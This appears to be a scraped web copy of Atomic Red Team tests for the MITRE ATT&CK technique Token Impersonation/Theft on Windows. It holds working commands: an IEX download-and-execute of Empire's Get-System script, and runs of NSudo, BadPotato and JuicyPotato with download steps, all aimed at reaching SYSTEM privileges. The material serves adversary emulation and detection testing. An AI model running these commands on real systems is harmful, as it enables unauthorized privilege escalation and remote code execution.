Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
Uses PowerShell and Empire’s GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it’s impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Supported Platforms: Windows
auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
1
powershell
! Elevation Required (e.g. root or admin)1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
1
SeDebugPrivilege
token duplicationUses PowerShell and Empire’s GetSystem module. The script uses
to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it’s impersonating (local SYSTEM).1
SeDebugPrivilege
Supported Platforms: Windows
auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
1
powershell
! Elevation Required (e.g. root or admin)1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
Launches the NSudo executable for a short period of time and then exits. NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
Supported Platforms: Windows
auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
| Name | Description | Type | Default Value | |——|————-|——|—————| | nsudo_path | Path to the NSudoLG.exe file | path | PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe|
1
powershell
!1
2
3
Start-Process "#{nsudo_path}" -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
1
powershell
!1
if (Test-Path "#{nsudo_path}") {exit 0} else {exit 1}
1
2
3
4
5
6
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Recurse -ErrorAction Ignore
https://github.com/BeichenDream/BadPotato Privilege escalation using named pipe connections
Supported Platforms: Windows
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
1
powershell
! Elevation Required (e.g. root or admin)1
2
3
4
5
cd "PathToAtomicsFolder\..\ExternalPayloads"
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
1
taskkill /f /im notepad.exe
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe" "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
This Atomic utilizes Juicy Potato to obtain privilege escalation. Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions. This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. Reference
Supported Platforms: Windows
auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
| Name | Description | Type | Default Value | |——|————-|——|—————| | potato_path | Path to the JuicyPotato.exe file | path | PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe| | listening_port | COM server listen port | integer | 7777| | target_exe | Target executable to launch with system privileges | path | $env:windir\system32\notepad.exe| | target_CLSID | Vulnerable CLSID to impersonate privileges | string | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}|
1
powershell
! Elevation Required (e.g. root or admin)1
cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}'
1
2
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"